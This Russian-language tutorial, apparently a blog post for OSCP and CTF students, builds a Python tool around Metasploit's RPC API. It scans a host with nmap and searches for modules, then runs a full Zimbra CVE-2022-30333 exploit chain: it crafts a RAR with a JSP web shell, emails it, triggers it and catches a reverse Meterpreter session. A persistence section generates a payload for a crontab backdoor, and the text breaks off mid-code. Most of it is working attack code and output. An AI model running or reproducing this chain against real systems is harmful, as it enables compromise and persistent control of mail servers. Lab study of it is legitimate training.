Используем Python и metasploit для автоматизации рутинных задач эксплуатации

от автора

Всем привет, у нас выходила статья по автоматизации действий атакующего, но идет время, Python уже получил много новых версий, да и metasploit не стоит на месте. Поэтому я постараюсь актуализировать информацию и заодно рассмотрю, как эффективно автоматизировать задачи постэксплуатации.

Последнее конечно шутка, но если вам часто приходится работать с metasploit, то написать небольшую тулзу, которая позволит автоматизировать рутинные действия, лишним не будет.

Главная цель автоматизации 

В процессе изучения Offensive Security (например, на курсах вроде OSCP), практики на CTF-платформах или участии в Bug Bounty-программах рано или поздно сталкиваешься с повторяющимися действиями: одни и те же команды, однотипные модули/утилиты, привычные скрипты. Постоянно запускать все вручную долго, шумно и неэффективно. Решением может стать написание собственных утилит, которые избавят от однотипных рутинных действий. Эта статья будет полезна в первую очередь студентам, изучающим offensive security, практикующимся на CTF-платформах или в рамках подготовки к курсам по информационной безопасности.

В качестве основного языка я выбрал Python, он прост в изучении, популярен, имеет огромное количество библиотек на любой вкус и цвет, а также активно используется в комьюнити: множество Proof of Concept (PoC) эксплойтов пишутся именно на Python. Это позволяет легко интегрировать их в код и анализировать логику атаки.

Второй компонент, но не менее важный, — Metasploit Framework. Он предоставляет обширную базу модулей для эксплуатации и постэксплуатации, а также мощный интерактивный шелл Meterpreter. Даже если вы используете собственные PoC, не реализованные в Metasploit, его возможности остаются крайне полезными для последующих этапов атаки.

Задача для автоматизации 

У нас есть веб-сервер на порту 443, который находится по адресу 10.10.2.50. Нужно выполнить сканирование сервера, найти уязвимость и проэксплуатировать её.

Подготовка лабораторного стенда 

Для взаимодействия с Metasploit будем использовать библиотеку pymetasploit от allfro, так как она имеет весь необходимый функционал, минимально необходимую документацию, поддержку и доступна напрямую через pip. Для того чтобы подключатся к metasploit, нужно запустить фоновый сервер msfrpcd, который позволяет управлять metasploit с использованием Remote Procedure Call.

Будем использовать:

  • metasploit-framework версии 6.4.56-dev;

  • библиотеку pymetasploit3 версии 1.0.6 и библиотеку pyyaml версии 6.0.2;

  • python3 версии 3.12.7.

Для начала работы мы создаем виртуальное окружение с помощью venv и устанавливаем в него pymetasploit3 и pyyaml:

┌──(root㉿kali)-[~/Documents] └─# python3.12 -m venv project1                                                                                                                              ┌──(root㉿kali)-[~/Documents] └─# source project1/bin/activate                                                                                                                              ┌──(project1)─(root㉿kali)-[~/Documents] └─# pip install pymetasploit3 pyyaml Collecting pymetasploit3

Следующим шагом нам нужно запустить msfrpcd-listener, я использую kali linux, поэтому он у меня уже установлен:

┌──(project1)─(root㉿kali)-[~/Documents] └─# cat /root/msfrpcd.sh #!/bin/sh  msfrpcd -P 1234567 -n -a 127.0.0.1 # P - Установить пароль # n - Отключить проверку SSL-сертификата (только для лаборатории) # a - Указать ip-адресс для прослушивания                                                                                                                              ┌──(project1)─(root㉿kali)-[~/Documents] └─# /root/msfrpcd.sh                                                                               [*] MSGRPC starting on 127.0.0.1:55553 (SSL):Msg... # По умолчанию выбирается порт 55553 [*] MSGRPC backgrounding at 2025-07-07 11:07:39 +0300... [*] MSGRPC background PID 42323

Автоматизация сканирования 

Реализуем небольшой модуль cканирования на основе nmap со следующей логикой:

  1. Сначала будет производиться быстрое сканирование всех портов.

  2. Потом открытые порты будут парситься, и уже только по ним будет проводиться полное сканирование с ключом A.

Для этого в корне проекта создаем папку tools и в ней скрипт scanner.py.

from tools.logger import logger import subprocess   def scan_ports(target: str) -> str | None:     #  Запуск сканирования портов     logger.info(f"[+] Получение списка открытых портов на {target}...")     result = subprocess.run(         f"nmap -p- --min-rate=500 {target}",         stdout=subprocess.PIPE,         text=True,         shell=True     )      # Обработка вывода nmap     open_ports = []     for line in result.stdout.splitlines():         if line and line[0].isdigit():             port = line.split('/')[0]             open_ports.append(port)      logger.info(open_ports)      # Преобразуем список портов в строку через запятую     ports_str = ','.join(open_ports)      if not ports_str:         return None      logger.info(f"[+] Открытые порты: {ports_str}")     logger.info(f"[+] Запуск детального сканирования на {target}...")      # Второй скан: детальный по найденным портам     scan_output = subprocess.run(         f"nmap -p{ports_str} -A {target}",         text=True,         stdout=subprocess.PIPE,         shell=True     ).stdout      logger.info(f"Результат сканирования:\n{scan_output}")     return scan_output

Для логирования создаем в этой же папке tools скрипт logger.py, в котором будут задаваться стандартные параметры логгера и указываться директория для хранения логов.

from logging import getLogger, INFO, Formatter, FileHandler, StreamHandler from sys import stdout  def setup_logger(log_file="main.log"):      logger = getLogger("main")     logger.setLevel(INFO)      # Проверим, есть ли уже обработчики (чтобы не дублировать вывод)     if not logger.handlers:         formatter = Formatter('[%(asctime)s] %(levelname)s: %(message)s',                                       datefmt='%Y-%m-%d %H:%M:%S')          # Лог-файл будет храниться в корне проекта в директории logs         file_handler = FileHandler(f"logs/{log_file}")         file_handler.setFormatter(formatter)         logger.addHandler(file_handler)          # Все логи также будут дублироваться в консоль         console_handler = StreamHandler(stdout)         console_handler.setFormatter(formatter)         logger.addHandler(console_handler)      return logger  logger = setup_logger("main.log")

Данная функция создает объект logger, используемый для логирования и вывода всей необходимой информации в консоль.
На данном этапе у нас уже есть:

  • функция, выполняющая полное сканирование заданного IP-адреса,

  • и функция, логирующая всю полученную информацию.

Следующим шагом реализуем сканер, который будет по информации, полученной от nmap, выполнять шаблонизированное сканирование и выводить информацию о найденных им сервисах.
Существуют, конечно, уже готовые и мощные инструменты, к примеру Nuclei. Он умеет проходиться по заранее заданным шаблонам, сканировать цели и определять, какие сервисы и уязвимости присутствуют. Он поддерживает YAML-шаблоны и в целом является полноценной системой для шаблонного аудита.

Но мне хотелось бы иметь легковесный и адаптируемый под конкретные задачи сканнер, который работает по заданной логике и легко встраивается в автоматическую цепочку действий. К тому же, написание своего сканера позволяет лучше понять, как устроен шаблонный аудит.
Вся логика будет строиться на простом YAML-шаблоне, в котором для каждого сервиса указываются:

  • краткое имя шаблона (в роли сигнатуры),

  • полное название сервиса,

  • ключ для поиска информации об уязвимостях (например, в Metasploit).

Пример такого шаблона:

Zimbra:                            # Название шаблона (сигнатура, по которой сверяемся)   name: Zimbra Collaboration Suite # Полное название сервиса   cve_search: zimbra               # Ключ для поиска уязвимостей Tomcat:   cve_search: apache tomcat   name: Apache Tomcat

С помощью ИИ-чатика я собрал небольшой набор таких шаблонов и написал следующую функцию в scanner.py, которая:

  1. Получает список сервисов из вывода Nmap;

  2. Сопоставляет их с шаблонами;

  3. Возвращает словарь с найденными сервисами.

def detect_services(scan_output: str, yaml_path: str) -> list[dict]:     with open(yaml_path, 'r', encoding='utf-8') as f:         service_dict = yaml.safe_load(f)      found_services = []      for service_key, meta in service_dict.items():         if service_key.lower() in scan_output.lower():             found_services.append({                 "id": service_key,                 "name": meta.get("name", service_key),                 "cve_search": meta.get("cve_search", service_key)             })      return found_services

Скрипт, который будет объединять все эти функции и выводить информацию о найденных сервисах, называем main.py и создаем его в корне проекта:

from tools.scanner import scan_ports, detect_services from tools.logger import logger import argparse   def main():     parser = argparse.ArgumentParser(usage="main.py target_ip")     parser.add_argument("ip", help="IP адрес или домен для сканирования")     args = parser.parse_args()      target_ip = args.ip      if (scan_output := scan_ports(target_ip)) is None:         logger.error("[-] Не было найдено открытых портов")         exit(1)     logger.info(scan_output)      yaml_path = "techmap.yaml"     services = detect_services(scan_output, yaml_path)      for i, service in enumerate(services, start=1):         service['number'] = i         logger.info(f"[{i}] Обнаружен сервис: {service['name']}")   if __name__ == "__main__":     main()

Этот скрипт принимает на вход ip-адрес для сканирования, выполняет его, определяет используемые сервисы и выводит их название. У меня на ip адресе 10.10.2.50 крутится веб-интерфейс Zimbra.

И если запустить сканирование скриптом, то мы получим следующий вывод:

└─# python3 main.py 10.10.2.50 INFO: [+] Получение списка открытых портов на 10.10.2.50... INFO: [+] Открытые порты: 22,25,53,110,143,389,443,465,587,993,995,5222,5269,7025,7071,7072,7073,7110,7143,7780,7993,7995,8443,11211 INFO: [+] Запуск детального сканирования на 10.10.2.50... ... INFO: [1] Обнаружен сервис: Zimbra Collaboration Suite INFO: [2] Обнаружен сервис: Apache HTTP Server INFO: [3] Обнаружен сервис: Postfix Mail Server INFO: [4] Обнаружен сервис: Nginx Web Server INFO: [5] Обнаружен сервис: OpenSSH Server

Чтобы не просто смотреть на список сервисов, а сразу искать под них что-то полезное, предложим пользователю выбрать интересующий его сервис. После этого, скрипт автоматически выполнит поиск всех подходящих эксплойтов в Metasploit.

Для этого создаем скрипт msfconnect.py в директории tools, который подключается к уже запущенному msfrpcd с помощью библиотеки pymetasploit3.

Добавляем простую функцию, которая по ключевому слову ищет и возвращает список соответствующих exploit-модулей из Metasploit:

from pymetasploit3.msfrpc import MsfRpcClient  # Клиент, через который можно обращаться к Metasploit client = MsfRpcClient("1234567", port=55553, ssl=True)   def search_msf_modules(query: str) -> list[dict] | None:     # Делаем search-запрос     results = client.modules.search(query)      # Фильтруем только exploit-модули     exploits = [         {             "fullname": m["fullname"],             "rank": m["rank"],             "name": m["name"]         }         for m in results if m["type"] == "exploit"     ]      return exploits

Интегрируем функцию search_msf_modules в main.py:

from tools.msfconnect import client, search_msf_modules  def main():     ...     for i, service in enumerate(services, start=1):         service['number'] = i         logger.info(f"[{i}] Обнаружен сервис: {service['name']}")          choice = input("Введите номер сервиса для поиска эксплойтов в metasploit: ").strip()      if not choice.isdigit():         logger.info("[-] Некорректный ввод. Ожидался номер.")         exit(1)      number = int(choice)     selected = next((s for s in services if s.get("number") == number), None)      if selected:         logger.info(f"[+] Вы выбрали: {selected['name']}")     else:         logger.info("[-] Сервиса с таким номером нет.")         exit(1)     exploits = search_msf_modules(selected["cve_search"])          if not exploits:         logger.info("[-] Ничего не найдено.")     else:         logger.info("Найдены следующие эксплойты:")         for i, exploit in enumerate(exploits, start=1):             logger.info(f"[{i}] {exploit['name']} ({exploit['rank']}): {exploit['fullname']}")

Запустив скрипт, получим следующий вывод:

└─# python3 main.py 10.10.2.50 ... INFO: [+] Запуск детального сканирования на 10.10.2.50... INFO: [1] Обнаружен сервис: Zimbra Collaboration Suite INFO: [2] Обнаружен сервис: Apache HTTP Server INFO: [3] Обнаружен сервис: Postfix Mail Server INFO: [4] Обнаружен сервис: Nginx Web Server INFO: [5] Обнаружен сервис: OpenSSH Server Введите номер сервиса для поиска эксплойтов в metasploit: 1 INFO: [+] Вы выбрали: Zimbra Collaboration Suite INFO: Найдены следующие эксплойты: INFO: [1] UnRAR Path Traversal (CVE-2022-30333) (excellent): exploit/linux/fileformat/unrar_cve_2022_30333 INFO: [2] TAR Path Traversal in Zimbra (CVE-2022-41352) (excellent): exploit/linux/http/zimbra_cpio_cve_2022_41352 INFO: [3] Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925) (excellent): exploit/linux/http/zimbra_mboximport_cve_2022_27925 INFO: [4] UnRAR Path Traversal in Zimbra (CVE-2022-30333) (excellent): exploit/linux/http/zimbra_unrar_cve_2022_30333 INFO: [5] Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF (excellent): exploit/linux/http/zimbra_xxe_rce INFO: [6] Zimbra sudo + postfix privilege escalation (excellent): exploit/linux/local/zimbra_postfix_priv_esc INFO: [7] Zimbra zmslapd arbitrary module load (excellent): exploit/linux/local/zimbra_slapper_priv_esc INFO: [8] Zimbra Collaboration Server LFI (excellent): exploit/unix/webapp/zimbra_lfi

Автоматизация эксплуатации 

После того, как мы получили список сервисов на целевом хосте и определили, что среди них работает Zimbra, следующим шагом проводим автоматизированное сканирование базы Metasploit на предмет доступных эксплойтов. Один из найденных модулей, UnRAR Path Traversal (CVE-2022-30333), позволяет загрузить веб-шелл на сервер, просто отправив специально сформированный RAR-архив.

Если мы запустим этот модуль в msfconsole, то получим следующий вывод:

msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > run [*] Exploit running as background job 2. [*] Exploit completed, but no session was created. # Атакующий хост Kali имеет IP-адрес 10.10.4.55 [*] Started reverse TCP handler on 10.10.4.55:4444  [*] Encoding the payload as a .jsp file [*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/erlx.jsp [*] Checking the HTTP connection to the target [+] payload.rar stored at /root/.msf4/local/payload.rar [+] File created! Email the file above to any user on the target Zimbra server [*] Trying to trigger the backdoor @ public/erlx.jsp every 5s [backgrounding]...

Модуль Metasploit автоматически:

  • создает .jsp бэкдор,

  • добавляет его в архив payload.rar,

  • запускает TCP handler.

Далее уже требуются действия от нас, а именно отправить вредоносный архив на любую почту, обрабатываемую уязвимым сервером Zimbra. Из-за уязвимости в механизме проверки вложений сервер распакует архив, в результате чего веб-шелл окажется в директории веб-сервера.

Соответственно, задача для автоматизации будет выглядеть следующим образом:

  1. Запускаем модуль с целью получить вредоносный архив, остальные действия модуля отключаем.

  2. Запускаем TCP handler (обработчик входящий подключений) для нужной нам полезной нагрузки.

  3. Отправляем письмо с вредоносным архивом на уязвимый сервер.

  4. Дожидаемся распаковки архива, в результате чего веб-шелл устанавливается в директорию веб-сервера.

  5. Отправляем GET-запрос на веб-шелл и инициируем обратное подключение.

  6. Получаем meterpreter-сессию с помощью ранее запущенного обработчика входящих подключений.

Далее в корне проекта создаем папку exploits и в ней скрипт для эксплуатации уязвимости UnRAR Path Traversal (CVE-2022-30333).

Для создания вредоносного архива реализуем функцию, которая будет запускать модуль из Metasploit:

from pathlib import Path from tools.msfconnect import client, run_module_with_output from tools.logger import logger  def main(config: dict):     logger.info("[+] Начало эксплуатации уязвимости CVE-2022-30333")      backdoor_name = "test.jsp"     rar_file_name = "payload.rar"     lport = 4455      if not create_malicious_archive(config["target"], config["lhost"], backdoor_name, rar_file_name):         logger.error("Не удалось создать архив")   def create_malicious_archive(target_ip: str, lhost, backdoor_name: str, rar_file_name: str, lport: int) -> bool:     logger.info("[+] Создаем вредоносный архив с помощью модуля Metasploit")     path_to_archive = Path(f"/root/.msf4/local/{rar_file_name}")     # Если архив уже существует, то нужно удалить его     if path_to_archive.exists():         path_to_archive.unlink()      # Указываем какой модуль хотим использовать     zimbra = client.modules.use('exploit', 'linux/http/zimbra_unrar_cve_2022_30333')     # Указываем основные параметры модуля     zimbra["RHOSTS"] = target_ip     zimbra["FILENAME"] = rar_file_name     zimbra["VERBOSE"] = True     zimbra["DisablePayloadHandler"] = False     zimbra["AllowNoCleanup"] = True     zimbra["TARGET_FILENAME"] = backdoor_name     zimbra["TRIGGER_PAYLOAD"] = False     zimbra["SSL"] = True     zimbra["RPORT"] = 443      # Создаем объект полезной нагрузки, чтобы указать lhost и lport для веб-шелла     pl = client.modules.use('payload', 'linux/x64/meterpreter/reverse_tcp')     pl['LHOST'] = lhost     pl['LPORT'] = lport      # Запускаем модуль и передаем в него объекты эксплойта и полезной нагрузки     output = run_module_with_output(zimbra, pl)     logger.info(output)      if path_to_archive.exists():         logger.info(f"Архив успешно создан: {path_to_archive}")         return True     logger.error(output)     return False

В данном скрипте инициализация начинается с вызова функции main и передачи словаря с необходимыми для атаки параметрами. Далее происходит вызов функции, которая подключается к API Metasploit через объект client, вызывает модуль zimbra_unrar_cve_2022_30333 и запускает его с помощью вспомогательной функции run_module_with_output:

def run_module_with_output(module, payload):     """ Запуск модуля в новой консоли и возврат вывода исполнения"""     new_console_sid = client.consoles.console().cid     return client.consoles.console(new_console_sid).run_module_with_output(module, payload)

Данная функция создает новую консоль в Metasploit и в ней запускает выбранный модуль.

Запуск данного скрипта эксплуатации возможен только через вызов функции main, соответственно, нужно доработать основной скрипт main.py, и в итоге мы получим следующую логику запуска:

  1. Сначала запускается основная функция, выполняется сканирование, после этого по выбранному сервису сканируются модули в Metasploit и предлагается использовать уже существующие модули.

  2. Или можно при вызове функции указать ключ -skip-scan и сразу перейти к выбору существующих модулей.

  3. После выбора модуля из него импортируется функция main и запускается со словарем config, который содержит IP-адрес атакуемого хоста и локальный адрес создания meterpreter-сессии.

from tools.scanner import scan_ports, detect_services from tools.logger import logger from tools.msfconnect import search_msf_modules from pathlib import Path import argparse import ipaddress import os import importlib   def main():     parser = argparse.ArgumentParser(usage="script.py target_ip")     parser.add_argument("ip", help="IP адрес или домен для сканирования")     # Параметр skip-scan позволяет пропустить стадию сканирования и отобразить все доступные скрипты     parser.add_argument("-skip-scan", action="store_true", help="Пропустить стадию сканирования")     # Локальный порт для получения meterpreter-сессии, если не указан, будет запрошен при необходимости     parser.add_argument("-lhost", help="Локальный IP-адрес для запуска эксплуатации")     # Параметр run-script также пропускает стадию сканирования и позволяет сразу вызвать необходимый скрипт     parser.add_argument("-run-script", help="Запустить определенный скрипт")     args = parser.parse_args()      target_ip = args.ip      if args.skip_scan or args.run_script:         logger.info("Пропускаем сканирование")         exploits = parse_exploits()         if args.run_script:             logger.info(f"Выбран следующий скрипт для запуска: {args.run_script}")             for exploit in exploits:                 if exploit["name"] == args.run_script:                     run_script(exploit, args)                     exit()             else:                 # Если скрипт не был найден, то предлагаем пользователю выбрать из всех доступных скриптов                 logger.error("Выбранный скрипт не найден, ищем все доступные скрипты")         logger.info("Найдены следующие скрипты эксплуатации:")         for i, exploit in enumerate(exploits, start=1):             logger.info(f"[{i}] {exploit["name"]}")             exploit["number"] = i          request_text = "Введите номер эксплойта для запуска эксплуатации: "         selected_exploit = parse_imput_number(exploits, request_text)                  run_script(selected_exploit, args)      else:         # Тут выполняется сканирование и поиск модулей в Metasploit         ...                  # После отображения всех Metaploit модулей, ищем скрипты из папки exploits для выбранного сервиса         logger.info("Поиск скриптов автоматизации для выбранного сервиса")         py_exploits = parse_exploits()          matches = [             exploit for exploit in py_exploits             if selected_service["cve_search"] in exploit['name']         ]          if matches:             logger.info("[+] Найдены следующие скрипты автоматической эксплуатации для выбранного сервиса:")             for i, exploit in enumerate(matches, start=1):                 exploit['number'] = i                 logger.info(f"[{i}] {exploit['name']}")         else:             logger.info("[-] Нет подходящих скриптов автоматизации")             exit(1)         # Из найденных скриптов предлагаем пользователю выбрать, какой запустить         request_text = "Введите номер скрипта автоматической эксплуатации: "         selected_exploit = parse_imput_number(matches, request_text)          run_script(selected_exploit, args)   # Парсит папку exploits и формирует словари для каждого найденного эксплойта def parse_exploits() -> list[dict]:     exploits_dir = Path.cwd().joinpath("exploits")     py_exploits = list(exploits_dir.glob("*.py"))      exploits_info = []      for exploit in py_exploits:         exploits_info.append({             "name": exploit.stem,             "path": exploit         })     return exploits_info   # Просит пользователя ввести номер и возвращает значение из словаря с этим номером def parse_imput_number(num_dict, request_text) -> dict:    ...   # Проверяет наличие необходимых параметров и формирует config def run_script(selected_exploit: dict, args: argparse.Namespace):     ...     config = {"target": args.ip, "lhost": lhost}     ...     import_and_run_main_from_path(selected_exploit["path"], config)   # С помощью importlib импортирует функцию main из скрипта по указанному пути и запускает ее передавая config def import_and_run_main_from_path(file_path, config):     ...     # Запускаем функцию main в нужном нам скрипте из папки exploits     module.main(config)   if __name__ == "__main__":     main()

Если мы на данном этапе запустим скрипт main.py, то получим следующим вывод:

└─# python3 main.py 10.10.2.50                                     INFO: [+] Получение списка открытых портов на 10.10.2.50... INFO: ['22', '25', '53', '110', '143', '389', '443', '465', '587', '993', '995', '5222', '5269', '7025', '7071', '7072', '7073', '7110', '7143', '7780', '7993', '7995', '8443', '11211'] INFO: [+] Открытые порты: 22,25,53,110,143,389,443,465,587,993,995,5222,5269,7025,7071,7072,7073,7110,7143,7780,7993,7995,8443,11211 INFO: [+] Запуск детального сканирования на 10.10.2.50... INFO: [1] Обнаружен сервис: Zimbra Collaboration Suite INFO: [2] Обнаружен сервис: Apache HTTP Server INFO: [3] Обнаружен сервис: Postfix Mail Server INFO: [4] Обнаружен сервис: Nginx Web Server INFO: [5] Обнаружен сервис: OpenSSH Server Введите номер сервиса для поиска эксплойтов в metasploit: 1 INFO: [+] Вы выбрали: Zimbra Collaboration Suite INFO: Найдены следующие эксплойты: INFO: [1] UnRAR Path Traversal (CVE-2022-30333) (excellent): exploit/linux/fileformat/unrar_cve_2022_30333 INFO: [2] TAR Path Traversal in Zimbra (CVE-2022-41352) (excellent): exploit/linux/http/zimbra_cpio_cve_2022_41352 INFO: [3] Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925) (excellent): exploit/linux/http/zimbra_mboximport_cve_2022_27925 INFO: [4] UnRAR Path Traversal in Zimbra (CVE-2022-30333) (excellent): exploit/linux/http/zimbra_unrar_cve_2022_30333 INFO: [5] Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF (excellent): exploit/linux/http/zimbra_xxe_rce INFO: [6] Zimbra sudo + postfix privilege escalation (excellent): exploit/linux/local/zimbra_postfix_priv_esc INFO: [7] Zimbra zmslapd arbitrary module load (excellent): exploit/linux/local/zimbra_slapper_priv_esc INFO: [8] Zimbra Collaboration Server LFI (excellent): exploit/unix/webapp/zimbra_lfi INFO: Поиск скриптов автоматизации для выбранного сервиса INFO: [+] Найдены следующие скрипты автоматической эксплуатации для выбранного сервиса: INFO: [1] exploit_zimbra_unrar_rce Введите номер скрипта автоматической эксплуатации: 1 INFO: [+] Вы выбрали: exploit_zimbra_unrar_rce Введите LHOST (IP-адрес для обратного подключения): 10.10.4.55 INFO: [+] Запуск скрипта с указаными параметрами INFO: [+] Начало эксплуатации уязвимости CVE-2022-30333 INFO: [+] Создаем вредоносный архив с помощью модуля Metasploit INFO: [*] Using configured payload linux/x64/meterpreter/reverse_tcp ... VERBOSE => true FILENAME => payload.rar RPORT => 443 SSL => true RHOSTS => 10.10.2.50 TARGET_FILENAME => test.jsp payload => linux/x64/meterpreter/reverse_tcp LPORT => 4455 LHOST => 10.10.4.55 [*] Exploit running as background job 8. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 10.10.4.55:4455  [*] Encoding the payload as a .jsp file [*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/test.jsp [+] payload.rar stored at /root/.msf4/local/payload.rar [+] File created! Email the file above to any user on the target Zimbra server  INFO: Архив успешно создан: /root/.msf4/local/payload.rar

Теперь давайте напишем в нашем скрипте 3 функции, которые будут делать следующее:

  1. Запускать обработчик входящий подключений.

  2. Отправлять письмо с вредоносным RAR-архивом.

  3. Делать GET-запрос к веб-шеллу и проверять наличие meterpreter-сессии.

def start_handler(lhost, lport):     handler = client.modules.use('exploit', 'multi/handler')      pl = client.modules.use('payload', 'linux/x64/meterpreter/reverse_tcp')     pl['LHOST'] = lhost     pl['LPORT'] = lport     # .execute позволяет запустить модуль в отдельном потоке, в отличие от run_module_with_output,     # который ожидает пока модуль не завершится     handler.execute(payload=pl)      # Посмотреть запущен ли хендлер можно командой:     logger.info(client.jobs.list)      # Вывод будет примерно следующий:     # INFO: {'11': 'Exploit: multi/handler'}

Функция start_handler использует модуль multi/handler, который запускает в фоне обработчик входящих подключений.

def send_malicious_mail(send_from: str, send_to: str, subject: str, text: str, file_path: str, server: str) -> bool:     msg = MIMEMultipart()     msg['Subject'] = subject     msg['From'] = send_from     msg['To'] = send_to      html = """\     <html>     <body>          <div>Hello</a>.</div>     </body>     </html>     """      part1 = MIMEText(text, 'plain')     part2 = MIMEText(html, 'html')      filename = os.path.basename(file_path)      # Читаем архив побайтово и прикрепляем его к письму     with open(file_path, "rb") as archive:         part3 = MIMEApplication(             archive.read(),             Name=filename         )      part3['Content-Disposition'] = f'attachment; filename="{filename}"'      msg.attach(part1)     msg.attach(part2)     msg.attach(part3)      timer = 90     while timer > 0:         try:             # Отправляем письмо             with smtplib.SMTP(server, 25) as server:                 server.sendmail(                     send_from,                     send_to,                     msg.as_string()                 )                 logger.info("[+] Письмо успешно отправлено")                 return True         except Exception as e:             logger.error(f"[-] Не удалось отправить письмо: {e}")         # Делаем 3 попытки отправить письмо         timer -= 30         sleep(30)     else:         logger.error("[-] Не удалось отправить письмо после 3 попыток")     return False

Функция send_malicious_mail формирует письмо и прикрепляет к нему сформированный ранее RAR-архив, после чего отправляет его на уязвимый Zimbra-сервер.

def activate_web_backdoor(target, backdoor_name) -> bool:     # Отправляет get-запрос на webshell и ожидаем получения meterpreter-сессии в ранее запущенном хендлере      # Команда client.sessions.list позволяет получить список со всеми открытыми сессиями, соответсвенно, если мы измерим     # этот список, то получим количество сессий до активации webshell     count_old_sessions = len(client.sessions.list)      try:         out = requests.get(             f"https://{target}/public/{backdoor_name}",             timeout=5,             verify=False,         )     except Exception as e:         logger.error(e)         logger.error("Веб-шелл не сработал")         return False      if out.status_code == 404:         logger.error("Веб-шелл не сработал")         return False      logger.info(f"Веб-шелл сработал: {out.status_code}")      # В течение 60 секунд проверяем количество открытых сессий     timer = 60     while timer > 0:         # Если сесссий после активации webshell стало больше, возвращаем True         if len(client.sessions.list) > count_old_sessions:             logger.info(client.sessions.list)             return True          sleep(5)         timer -= 5     return False

Функция activate_web_backdoor отправляет GET-запрос на веб-шелл и в течение 60 секунд проверяет наличие новой meterpreter-сессии с Zimbra-сервером.

Давайте теперь добавим вызов этих функций в функцию main:

def main(config: dict):     logger.info("[+] Начало эксплуатации уязвимости CVE-2022-30333")      backdoor_name = "test.jsp"     rar_file_name = "payload.rar"     path_to_archive = Path(f"/root/.msf4/local/{rar_file_name}")     lport = 4455      if not create_malicious_archive(             config["target"], config["lhost"], backdoor_name, rar_file_name, lport, path_to_archive     ):         logger.error("Не удалось создать архив")         exit(1)      start_handler(config["lhost"], lport)      # Самое главное, чтобы адресат существовал на сервере, zimbra по умолчанию создает ящик admin@{domain}     send_from = 'admin@evil.corp'     send_to = 'admin@ampire.corp'     subject = "Some important info"     text = "Just simple mail"      if not send_malicious_mail(send_from, send_to, subject, text, str(path_to_archive), config["target"]):         logger.error("Не удалось отправить письмо")         exit(1)     sleep(10)     if activate_web_backdoor(config["target"], backdoor_name):         logger.info("[+] Meterpreter-сессия с Zimbra сервером успешно получена")     else:         logger.error("[-] Не удалось получить meterpreter-сессию")

Данная функция поочередно вызывает все функции и в случае ошибки выводит информацию об этом в консоль.

Если мы запустим основной скрипт и выберем уязвимость exploit_zimbra_unrar_rce, то получим следующим результат:

└─# python3 main.py -run-script exploit_zimbra_unrar_rce -lhost 10.10.4.55 10.10.2.50 INFO: Пропускаем сканирование INFO: Пропускаем сканирование INFO: Выбран следующий скрипт для запуска: exploit_zimbra_unrar_rce INFO: [+] Запуск скрипта с указаными параметрами INFO: [+] Начало эксплуатации уязвимости CVE-2022-30333 INFO: [+] Создаем вредоносный архив с помощью модуля Metasploit INFO: Архив успешно создан: /root/.msf4/local/payload.rar INFO: {'30': 'Exploit: multi/handler'} INFO: [+] Письмо успешно отправлено INFO: Веб-шелл сработал: 200 INFO: {'5': {'type': 'meterpreter', 'tunnel_local': '10.10.4.55:4455', 'tunnel_peer': '10.10.2.50:54876', 'via_exploit':  'exploit/multi/handler', 'via_payload': 'payload/linux/x64/meterpreter/reverse_tcp',  'desc': 'Meterpreter', 'info': 'zimbra @ mail.ampire.corp', 'workspace': 'false',  'session_host': '10.10.2.50', 'session_port': 54876, 'target_host': '',  'username': 'root', 'uuid': 'kbzomkri', 'exploit_uuid': 'wmanuctl',  'routes': '', 'arch': 'x64', 'platform': 'linux'}} INFO: [+] Meterpreter-сессия с Zimbra сервером успешно получена

В выводе также приведена информация о сессии, в поле info можно увидеть, что мы подключены под пользователем zimbra, поле username некорректно отображает информацию о пользователе.

Для дополнительного закрепления в системе напишем универсальную полезную нагрузку, которую можно будет вызвать после успешного завершения основного скрипта автоматизации атаки. В качестве полезной нагрузки можно взять стандартный crontab бэкдор.

Для этого создадим папку generic_payloads и в ней создадим скрипт linux_generic_payloads.py:

from tools.msfconnect import client from tools.logger import logger from time import sleep from pathlib import Path from re import search  # Основаня функция def generic_create_crontab_backdoor(config: dict):     lport_backdoor = 6677     crontab_backdoor_name = "default_settings"     crontab_check_file = "check_cron"      # Получаем объект meterpreter-сессии для выполнения команд на взломанном хосте     if len(client.sessions.list) > 0:         meterpreter_session = client.sessions.session(list(client.sessions.list)[-1])     else:         raise Exception("No meterpreter session")      try:         # Метерпретер-сессия имеет свои команды, команада execute позволяет запустить исполняемый файл         # Ключ -f позволяет указать, какой файл запустить         # Ключ -c запускает файл в отдельном потоке         meterpreter_session.write('execute -f env -c')         sleep(5)          # С помощью meterpreter_session.read() получаем результат выполнения команды         for line in str(meterpreter_session.read()).splitlines():             if 'Channel' in line:                 # Так как мы запустили скрипт в потоке, получаем номер потока и читаем его вывод                 channel_number = ''.join(ch for ch in line if ch.isdigit())                 meterpreter_session.write(f"read {channel_number}")                 sleep(2)         session_environ = meterpreter_session.read()         # После этого логируем окружение пользователя Zimbra         logger.info(f'Session environ: \n{session_environ}')          # Достаем из окружения home_dir         home_dir = Path(search(r'HOME=(/.*)', session_environ).group(1))     except AttributeError:         # Если не удалось, указываем за home_dir директорию tmp         home_dir = Path("/tmp")      # Указываем необходимые переменные     remote_path_payload = home_dir / crontab_backdoor_name     local_path_to_payload = Path().cwd().joinpath(crontab_backdoor_name)     # Файл в который будем сохранять текущие задачи crontab     remote_path_cron_file = Path("/tmp").joinpath(crontab_check_file)      # Генерируем полезную нагрузку в файл     generate_payload(config['lhost'], lport_backdoor, local_path_to_payload)      # Запускаем функция создания задачи и получаем результат True/False     creation_result = create_backdoor_task_in_crontab(         local_path_to_payload,         remote_path_payload,         meterpreter_session,         remote_path_cron_file     )      if creation_result:         logger.info("Бэкдор упешно создан")     else:         logger.error("Ошибка при создании бэкдора в crontab")         exit(1)   def generate_payload(         lhost_pl: str,         lport_pl: int,         local_path_to_payload: Path | str,         pl_format='elf',         payload=('payload', 'linux/x64/meterpreter/reverse_tcp') ) -> None:     """ Фцнкция создает файл с полезной нагрузкой """     payload = client.modules.use(*payload)     payload['LHOST'] = lhost_pl     payload['LPORT'] = lport_pl     payload.runoptions['Format'] = pl_format     # Генерируем полезную нагрузку и записываем ее в файл     data = payload.payload_generate()     with open(local_path_to_payload, 